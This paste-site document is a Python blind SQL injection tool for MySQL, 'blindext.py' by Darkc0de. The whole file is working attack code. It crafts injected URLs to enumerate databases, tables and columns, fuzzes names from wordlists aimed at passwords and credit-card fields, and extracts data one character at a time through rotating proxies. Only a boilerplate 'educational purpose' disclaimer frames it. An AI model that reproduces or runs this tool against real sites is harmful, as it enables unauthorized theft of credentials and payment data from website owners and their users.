- #!/usr/bin/python
- # Features!
- # 1.MySQL Blind Injection Data Extractor
- # 2.MySQL Blind Information_schema Database Enumerator
- # 3.MySQL Blind Table and Column Fuzzer
- # Feel free to do whatever you want with this code!
- # Share the c0de!
- # Darkc0de Team
- # www.darkc0de.com
- # rsauron[at]gmail[dot]com
- # Greetz to
- # d3hydr8, P47r1ck, Tarsian, c0mr@d, reverenddigitalx
- # and the rest of the Darkc0de members
- # This was written for educational purpose only. Use it at your own risk.
- # Author will be not responsible for any damage!
- # Intended for authorized Web Application Pen Testing!
- # Change Log
- # 2.9 - added info mode, bug fix in the GuessValue function
- # 3.0 - added row option.. now you can tell the app where to begin - remember limit start at 0 not 1
- #Fill in the tables you want tested here.
- fuzz_tables = ["user","users","username","usernames","mysql.user","orders","order_items","member","members","admin","administrator","administrators","login","logins","logon","jos_users","jos_contact_details","userrights","account","superuser","control","usercontrol","author","autore","artikel","newsletter","tb_user","tb_users","tb_username","tb_usernames","tb_admin","tb_administrator","tb_member","tb_members","tb_login","perdorues","korisnici","webadmin","webadmins","webuser","webusers","webmaster","webmasters","customer","customers","sysuser","sysusers","sysadmin","sysadmins","memberlist","tbluser","tbl_user","tbl_users","a_admin","x_admin","m_admin","adminuser","admin_user","adm","userinfo","user_info","admin_userinfo","userlist","user_list","user_admin","order","user_login","admin_user","admin_login","login_user","login_users","login_admin","login_admins","sitelogin","site_login","sitelogins","site_logins","SiteLogin","Site_Login","User","Users","Admin","Admins","Login","Logins","adminrights","news","perdoruesit"]
- #Fill in the columns you want tested here.
- fuzz_columns = ["user","username","password","passwd","pass","id","email","emri","fjalekalimi","pwd","user_name","customers_email_address","customers_password","user_password","name","user_pass","admin_user","admin_password","admin_pass","usern","user_n","users","login","logins","login_user","login_admin","login_username","user_username","user_login","auid","apwd","adminid","admin_id","adminuser","admin_user","adminuserid","admin_userid","adminusername","admin_username","adminname","admin_name","usr","usr_n","usrname","usr_name","usrpass","usr_pass","usrnam","nc","uid","userid","user_id","myusername","mail","emni","logohu","punonjes","kpro_user","wp_users","emniplote","perdoruesi","perdorimi","punetoret","logini","llogaria","fjalekalimin","kodi","emer","ime","korisnik","korisnici","user1","administrator","administrator_name","mem_login","login_password","login_pass","login_passwd","login_pwd","sifra","lozinka","psw","pass1word","pass_word","passw","pass_w","user_passwd","userpass","userpassword","userpwd","user_pwd","useradmin","user_admin","mypassword","passwrd","admin_pwd","admin_pass","admin_passwd","mem_password","memlogin","admin_id","adminid","e_mail","usrn","u_name","uname","mempassword","mem_pass","mem_passwd","mem_pwd","p_word","pword","p_assword","myusername","myname","my_username","my_name","my_password","my_email","cvvnumber","order_payment","card_number","is_admin","cc_number","ccnum","cc_num","credit_card_number","cvc_code","billing_first_name","cvv","cvv2","firstname","lastname","fname","lname","first","last"]
- import urllib, sys, re, os, socket, httplib, urllib2, time
- #the guts and glory - Binary Algorithim that does all the guessing
- def GuessValue(URL):
- global gets
- global proxy_num
- lower = lower_bound
- upper = upper_bound
- while lower < upper:
- try:
- mid = (lower + upper) / 2
- head_URL = URL + ">"+str(mid)
- #print head_URL
- gets+=1
- proxy_num+=1
- source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
- match = re.findall(string,source)
- if len(match) >= 1:
- lower = mid + 1
- else:
- upper = mid
- except (KeyboardInterrupt, SystemExit):
- raise
- except:
- pass
- if lower > lower_bound and lower < upper_bound:
- value = lower
- else:
- head_URL = URL + "="+str(lower)
- gets+=1
- proxy_num+=1
- source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
- match = re.findall(string,source)
- if len(match) >= 1:
- value = lower
- else:
- value = 63
- print "Could not find the ascii character! There must be a problem.."
- print "Check to make sure your using the app right!"
- print "READ xprog's blind sql tutorial!n"
- sys.exit(1)
- return value
- #determine platform
- if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
- SysCls = 'clear'
- elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
- SysCls = 'cls'
- else:
- SysCls = 'unknown'
- #say hello
- os.system(SysCls)
- if len(sys.argv) <= 1:
- print "n|---------------------------------------------------------------|"
- print "| rsauron[@]gmail[dot]com v3.0 |"
- print "| 7/2008 blindext.py |"
- print "| -Blind MySQL v5+ Information_schema Database Enumeration |"
- print "| -Blind MySQL v4+ Data Extractor |"
- print "| -Blind MySQL v4+ Table & Column Fuzzer |"
- print "| Usage: blindext.py [options] |"
- print "| -h help darkc0de.com |"
- print "|---------------------------------------------------------------|n"
- sys.exit(1)
- #define varablies
- site = ""
- string = ""
- dbt = "blindextlog.txt"
- proxy = "None"
- count = 0
- mode = "None"
- arg_table = "None"
- arg_database = "None"
- arg_columns = "None"
- arg_dump = "None"
- arg_schema = "None"
- arg_dbs = "None"
- arg_mysqldb = ""
- darkc0de = ""
- line_URL = ""
- lower_bound = 0
- upper_bound = 10000
- gets = 0
- mid =0
- let_pos = 1
- lim_num = 0
- value = ""
- #help option
- for arg in sys.argv:
- if arg == "-h":
- print "n Usage: ./blindext.py [options] rsauron[@]gmail[dot]com darkc0de.com"
- print "tModes:"
- print "tDefine: --schema Enumerate Information_schema Database."
- print "tDefine: --dump Extract information from a Database, Table and Column."
- print "tDefine: --dbs Shows all databases user has access too."
- print "tDefine: --fuzz Fuzz Tables and Columns."
- print "tDefine: --info Prints server version, username@location, database name."
- print "ntRequired:"
- print "tDefine: -u "www.site.com/news.php?id=234""
- print "tDefine: -s "truetextinpage""
- print "ntModes dump and schema options:"
- print "tDefine: -D "database_name""
- print "tDefine: -T "table_name""
- print "tDefine: -C "column_name,column_name...""
- print "ntOptional:"
- print "tDefine: -r row to begin extracting info at."
- print "tDefine: -p " or proxy.txt""
- print "tDefine: -o "ouput_file_name.txt" Default:blindextlog.txt"
- print "n Ex: ./blindext.py --dbs -u "www.site.com/news.php?id=234" -s "textinpage" -o output.txt"
- print " Ex: ./blindext.py --fuzz -u "www.site.com/news.php?id=234" -s "textinpage" -p"
- print " Ex: ./blindext.py --schema -u "www.site.com/news.php?id=234" -s "textinpage" -D catalog"
- print " Ex: ./blindext.py --schema -u "www.site.com/news.php?id=234" -s "textinpage" -D catalog -T orders -p proxy.txt"
- print " Ex: ./blindext.py --dump -u "www.site.com/news.php?id=234" -s "textinpage" -D newjoom -T jos_users -C username,password"
- sys.exit(1)
- #Check args
- for arg in sys.argv:
- if arg == "-u":
- site = sys.argv[count+1]
- elif arg == "-s":
- string = sys.argv[count+1]
- elif arg == "-o":
- dbt = sys.argv[count+1]
- elif arg == "-p":
- proxy = sys.argv[count+1]
- elif arg == "--dump":
- mode = arg
- arg_dump = sys.argv[count]
- elif arg == "--schema":
- mode = arg
- arg_schema = sys.argv[count]
- elif arg == "--dbs":
- mode = arg
- arg_dbs = sys.argv[count]
- elif arg == "--fuzz":
- mode = arg
- arg_fuzz = sys.argv[count]
- elif arg == "--info":
- mode = arg
- arg_info = sys.argv[count]
- elif arg == "-D":
- arg_database = sys.argv[count+1]
- elif arg == "-T":
- arg_table = sys.argv[count+1]
- elif arg == "-C":
- arg_columns = sys.argv[count+1]
- elif arg == "-r":
- lim_num = sys.argv[count+1]
- count+=1
- #Title write
- file = open(dbt, "a")
- print "n|---------------------------------------------------------------|"
- print "| rsauron[@]gmail[dot]com v3.0 |"
- print "| 7/2008 blindext.py |"
- print "| -Blind MySQL v5+ Information_schema Database Enumeration |"
- print "| -Blind MySQL v4+ Data Extractor |"
- print "| -Blind MySQL v4+ Table & Column Fuzzer |"
- print "| Usage: blindext.py [options] |"
- print "| -h help darkc0de.com |"
- print "|---------------------------------------------------------------|"
- file.write("nn|---------------------------------------------------------------|")
- file.write("n| rsauron[@]gmail[dot]com v3.0 |")
- file.write("n| 7/2008 blindext.py |")
- file.write("n| -Blind MySQL v5+ Information_schema Database Enumeration |")
- file.write("n| -Blind MySQL v4+ Data Extractor |")
- file.write("n| -Blind MySQL v4+ Table & Column Fuzzer |")
- file.write("n| Usage: blindext.py [options] |")
- file.write("n| -h help darkc0de.com |")
- file.write("n|---------------------------------------------------------------|")
- #Arg Error Checking
- if site == "":
- print "n[-] Must include -u flag and -s flag."
- print "[-] For help -hn"
- sys.exit(1)
- if string == "":
- print "n[-] Must include -s flag followed by "truetextinpage" string."
- print "[-] For help -hn"
- sys.exit(1)
- if mode == "None":
- print "n[-] Mode must be specified --schema --dbs --dump --fuzz"
- print "[-] For help -hn"
- sys.exit(1)
- if mode == "--schema" and arg_database == "None":
- print "[-] Must include -D flag!"
- print "[-] For Help -hn"
- sys.exit(1)
- if mode == "--dump":
- if arg_table == "None" or arg_columns == "None":
- print "[-] If MySQL v5+ must include -D, -T and -C flag when --dump specified!"
- print "[-] If MySQL v4+ must include -T and -C flag when --dump specified!"
- print "[-] For help -hn"
- sys.exit(1)
- if proxy != "None":
- if len(proxy.split(".")) == 2:
- proxy = open(proxy, "r").read()
- if proxy.endswith("n"):
- proxy = proxy.rstrip("n")
- proxy = proxy.split("n")
- if arg_columns != "None":
- arg_columns = arg_columns.split(",")
- if site[:7] != "http://":
- site = "http://"+site
- #Build proxy list
- print "n[+] URL:",site
- file.write("nn[+] URL:"+site+"n")
- socket.setdefaulttimeout(10)
- proxy_list = []
- if proxy != "None":
- file.write("[+] Building Proxy List...")
- print "[+] Building Proxy List..."
- for p in proxy:
- try:
- proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
- opener = urllib2.build_opener(proxy_handler)
- opener.open("http://www.google.com")
- proxy_list.append(urllib2.build_opener(proxy_handler))
- file.write("ntProxy:"+p+"- Success")
- print "tProxy:",p,"- Success"
- except:
- file.write("ntProxy:"+p+"- Failed")
- print "tProxy:",p,"- Failed"
- pass
- if len(proxy_list) == 0:
- print "[-] All proxies have failed. App Exiting"
- file.write("n[-] All proxies have failed. App Exitingn")
- sys.exit(1)
- print "[+] Proxy List Complete"
- file.write("[+] Proxy List Complete")
- else:
- print "[-] Proxy Not Given"
- file.write("[+] Proxy Not Given")
- proxy_list.append(urllib2.build_opener())
- #Gather Server Config
- print "[+] Gathering MySQL Server Configuration..."
- file.write("n[+] Gathering MySQL Server Configuration...")
- proxy_num = 0
- proxy_len = len(proxy_list)
- ser_ver = 3
- while 1:
- try:
- config_URL = site+"+and+substring(@@version,1,1)="+str(ser_ver)
- proxy_num+=1
- source = proxy_list[proxy_num % proxy_len].open(config_URL).read()
- match = re.findall(string,source)
- if len(match) >= 1:
- print "t[+] MySQL >= v"+str(ser_ver)+".0.0 found!"
- file.write("nt[+] MySQL >= v"+str(ser_ver)+".0.0 found!")
- if int(ser_ver) <= 4 and mode == "--schema":
- print "t[-] Schema & dbs mode only works on MySQL v5+!!"
- file.write("nt[-] Schema & dbs mode only work on MySQL v5+!!")
- print "[-] Done"
- file.write("[-] Done")
- sys.exit(1)
- if int(ser_ver) <= 4 and mode == "--dbs":
- print "t[-] Schema & dbs mode only works on MySQL v5+!!"
- file.write("nt[-] Schema & dbs mode only work on MySQL v5+!!")
- print "[-] Done"
- file.write("[-] Done")
- sys.exit(1)
- break
- if int(ser_ver) >= 6:
- print "t[-] Not a MySQL server or the string your using is not being found!"
- file.write("nt[-] Not a MySQL server or the string your using is not being found!")
- print "[-] Done"
- file.write("[-] Done")
- sys.exit(1)
- ser_ver+=1
- gets+=1
- except (KeyboardInterrupt, SystemExit):
- raise
- except:
- pass
- #Build URLS
- if mode == "--schema":
- if arg_database != "None" and arg_table == "None":
- print "[+] Showing Tables from database ""+arg_database+"""
- file.write("n[+] Showing Tables from database ""+arg_database+""")
- count_URL = site+"+and+((SELECT+COUNT(table_name)"
- count_URL += "+FROM+information_schema.TABLES+WHERE+table_schema+=+0x"+arg_database.encode("hex")+"))"
- line_URL = site+"+and+ascii(substring((SELECT+table_name"
- line_URL += "+FROM+information_schema.TABLES+WHERE+table_schema+=+0x"+arg_database.encode("hex")
- if arg_database != "None" and arg_table != "None":
- print "[+] Showing Columns from database ""+arg_database+"" and Table ""+arg_table+"""
- file.write("n[+] Showing Columns from database ""+arg_database+"" and Table ""+arg_table+""")
- count_URL = site+"+and+((SELECT+COUNT(column_name)"
- count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema+=+0x"+arg_database.encode("hex")
- count_URL += "+AND+table_name+=+0x"+arg_table.encode("hex")+"))"
- line_URL = site+"+and+ascii(substring((SELECT+column_name"
- line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema+=+0x"+arg_database.encode("hex")
- line_URL += "+AND+table_name+=+0x"+arg_table.encode("hex")
- elif mode == "--dump":
- print "[+] Dumping data from database ""+str(arg_database)+"" Table ""+str(arg_table)+"""
- print "[+] and Column(s) "+str(arg_columns)
- file.write("n[+] Dumping data from database ""+str(arg_database)+"" Table ""+str(arg_table)+""")
- file.write("n[+] Column(s) "+str(arg_columns))
- for column in arg_columns:
- darkc0de += column+",0x3a,"
- darkc0de = darkc0de.rstrip("0x3a,")
- count_URL = site+"+and+((SELECT+COUNT(*)+FROM+"
- count_URL = count_URL+""+arg_database+"."+arg_table+"))"
- line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+"
- line_URL = line_URL+""+arg_database+"."+arg_table
- if ser_ver == 4:
- count_URL = site+"+and+((SELECT+COUNT(*)+FROM+"+arg_table+"))"
- line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+"+arg_table
- if arg_database == "mysql" or arg_database == "MYSQL" or arg_database == "MySQL":
- count_URL = site+"+and+((SELECT+COUNT(*)+FROM+mysql."+arg_table+"))"
- line_URL = site+"+and+ascii(substring((SELECT+concat("+darkc0de+")+FROM+mysql."+arg_table
- elif mode == "--dbs":
- print "[+] Showing all databases current user has access too!"
- file.write("n[+] Showing all databases current user has access too!")
- count_URL = site+"+and+((SELECT+COUNT(schema_name)"
- count_URL += "+FROM+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")+"))"
- line_URL = site+"+and+ascii(substring((SELECT+schema_name"
- line_URL += "+from+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")
- line_URL += "+LIMIT+"
- if mode == "--info":
- print "[+] Showing database version, username@location, and database name!"
- file.write("n[+] Showing database version, username@location, and database name!")
- count_URL = "Nothing"
- line_URL = site+"+and+ascii(substring((SELECT+concat(version(),0x3a,user(),0x3a,database())),"
- #Lets Fuzz
- if mode == "--fuzz":
- print "n[%s] StartTime" % time.strftime("%X")
- file.write("nn[%s] StartTime" % time.strftime("%X"))
- print "[+] Fuzzing Tables..."
- file.write("n[+] Fuzzing Tables...")
- fuzz_TABLE_url = site+"+and+(SELECT+1+from+TABLE+limit+0,1)=1"
- for table in fuzz_tables:
- try:
- proxy_num+=1
- gets+=1
- table_URL = fuzz_TABLE_url.replace("TABLE",table)
- source = proxy_list[proxy_num % proxy_len].open(table_URL).read()
- match = re.findall(string,source)
- if len(match) >= 1:
- print "n[Table]:",table
- file.write("nn[Table]:"+table)
- fuzz_COLUMN_url = site+"+and+(SELECT+substring(concat(1,COLUMN),1,1)+from+"+table+"+limit+0,1)=1"
- for column in fuzz_columns:
- try:
- proxy_num+=1
- gets+=1
- column_URL = fuzz_COLUMN_url.replace("COLUMN",column)
- source = proxy_list[proxy_num % proxy_len].open(column_URL).read()
- match = re.findall(string,source)
- if len(match) >= 1:
- print "[Column]:",column
- file.write("n[Column]:"+column)
- except (KeyboardInterrupt, SystemExit):
- raise
- except:
- pass
- except (KeyboardInterrupt, SystemExit):
- raise
- except:
- pass
- print "n[%s] EndTime" % time.strftime("%X")
- print "[-] Total URL Requests",gets
- file.write("nn[%s] EndTime" % time.strftime("%X"))
- file.write("n[-] Total URL Requests "+str(gets))
- print "[-] Donen"
- file.write("n[-] Donen")
- print "Don't forget to check", dbt,"n"
- file.close()
- sys.exit(1)
- #lets count how many rows before we begin
- print "[+] %s" % time.strftime("%X")
- file.write("n[+] %s" % time.strftime("%X"))
- if mode != "--info":
- row_value = GuessValue(count_URL)
- print "[+] Number of Rows: ",row_value,"n"
- file.write("n[+] Number of Rows: "+str(row_value)+"n")
- else:
- row_value = 1
- #print line_URL
- #print Count_URL
- #Primary Loop
- lower_bound = 0
- upper_bound = 127
- for data_row in range(int(lim_num), row_value):
- sys.stdout.write("[%s]: " % (lim_num))
- file.write("n[%s]: " % (lim_num))
- sys.stdout.flush()
- value = chr(upper_bound)
- while value != chr(0):
- try:
- if mode != "--info":
- Guess_URL = line_URL + str(lim_num) +",1),"+str(let_pos)+",1))"
- #print Guess_URL
- value = chr(GuessValue(Guess_URL))
- sys.stdout.write("%s" % (value))
- file.write(value)
- sys.stdout.flush()
- let_pos+=1
- else:
- Guess_URL = line_URL + str(let_pos)+",1))"
- #print Guess_URL
- value = chr(GuessValue(Guess_URL))
- sys.stdout.write("%s" % (value))
- file.write(value)
- sys.stdout.flush()
- let_pos+=1
- except (KeyboardInterrupt, SystemExit):
- raise
- except:
- pass
- print
- lim_num = int(lim_num) + 1
- let_pos = 1
- data_row+=1
- #Lets wrap it up!
- print "n[-] %s" % time.strftime("%X")
- print "[-] Total URL Requests",gets
- file.write("nn[-] %s" % time.strftime("%X"))
- file.write("n[-] Total URL Requests "+str(gets))
- print "[-] Donen"
- file.write("n[-] Donen")
- print "Don't forget to check", dbt,"n"
- file.close()

By: Guest | Date: Apr 24 2009 10:27 | Format: None | Expires: never | Size: 23.56 KB | Hits: 1673
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